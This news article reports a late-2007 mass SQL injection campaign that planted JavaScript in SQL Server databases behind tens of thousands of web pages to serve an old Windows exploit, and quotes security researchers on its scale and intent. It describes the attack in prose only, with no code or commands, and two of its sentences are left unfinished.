70,000 Web Pages Hacked By Database Attack
The attacker penetrated the sites by discovering applications where the site builder expected a user name, address or other innocuous information to be typed in by the site visitor.
Web sites that naively call for user input, then fail to put strict checks on what that input may be, are susceptible to SQL injection attacks. That vulnerability appears to be the cause of up to 70,000 Web pages getting hacked by malicious code between Dec. 28 and Jan. 5.
The intrusions represent a whole new level of threat to users on the Internet. Instead of the attack seeking to launch a virus or worm at individual computers, it invaded Web databases and used them to host its malicious code and distribute it every time site visitors sought information beyond a home page or product page from the database. But for the fact it used an old and already guarded against Windows exploit, it might still be spreading across the Internet, security experts said.
"I don't think we've seen this scale of database intrusion before. SQL injection attacks are usually on a one-at-a-time basis," said Phil Neray, VP of marketing at Guardium, a Waltham, Mass., firm that makes database protection software.
The URL and server used to launch the attack was based in China and a Chinese site first posted information on the attack. The domain name now only shows the text, "OK" with the ^_^ emoticon.
"This was a pretty good mass-hack, and it wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared," said Roger Thompson, chief research officer of Grisoft, producer of anti-virus software. Thompson is the founder of Exploit Prevention Labs, producer of LinkScan, which scans Web applications for malware. The firm was acquired by Grisoft in December.
The attacker penetrated the sites by discovering applications where the site builder expected a user name, address or other innocuous information to be typed in by the site visitor. The automated attack used such forms to inject a SQL statement instead of text, and thousands of Web applications apparently passed the statement on to the site database. The attack was launched Dec. 28. Security experts said the number of sites affected now appears to be declining, but it's not clear whether the attack has been completely stifled or might be relaunched from a new URL.
As of Jan. 5, it appeared to have peaked and was in reversal as sites closed SQL injection exposures in their databases. Neray estimated
Sites that show up in a Google search as containing the attack's original site URL include Rust-Oleum's Premiumgaragefloors.com; certain pages of CA, the system software vendor with a security product line; and the Haworth Press's seed catalogue, among many others. Thompson said in a Jan. 5 blog on the Grisoft Web site that it was Microsoft SQL Server databases that ended up as the target of the attack because the tables targeted are specific to SQL Server. But neither Neray nor Thompson could specify the purpose of the attack or what damage it might be doing beyond attaching JavaScript to text links inside the database. The intrusion of each database is massive, with a JavaScript string being attached to all text items in the database. A site user's request for an information item then leads to the attacker's JavaScript response attempting to plant code on the user's computer. The attack typically invades a site with a catalogue or other large text files stored on a SQL Server database. As a site visitor clicks on a Web site's button or link for more information, such as "more information" from a catalogue, the database is activated to send a JavaScript plant onto the user's computer.
But there's been no evidence of the attacker following through to activate the code placements on user computers. The plants take advantage of a widely publicized Windows vulnerability, listed as the MS06-014 exploit by the Internet Storm Center, a site sponsored by the SANS Institute for quick identification of threats on the Internet.
Neray said attackers use such an approach when they are lining up many computers around the Web with which to stage a denial of service attack or other automated action against a particular Web site. He said it's also possible the attacker was merely illustrating his ability to penetrate database systems and reach many user's computers. Unlike worms and viruses, the attack is aimed at Web site databases, which are then used to launch user intrusions on a massive scale. As such, it illustrates
The Windows exploit that attack takes advantage of has been known since September 2006 and many user's computers are likely to be protected from it by updates to their Windows operating system. In his Jan. 5 blog, Thompson said the attack on Web sites showed that the attackers "went to the trouble of preparing a good website exploit, and a good mass-hack, but then used a moldy old client exploit. It's almost a dichotomy." That is, if the successful Web site database attack had been followed up with a sophisticated Windows client attack, the intruder might still be spreading across the Internet.
John Gormly, a blogger at myITforum.com Inc., commented Jan. 6: "Part of security software vendor CA's website was hacked last week and was redirecting visitors to a malicious website hosted in China. Although the problem now appears to have been corrected, cached versions of some pages in the press section of CA.com show that the site had been redirecting visitors to the uc8010.com domain, which has been serving malicious software since late December, according to Marcus Sachs, director of the SANS Internet Storm Center."
Source: www.informationweek.com
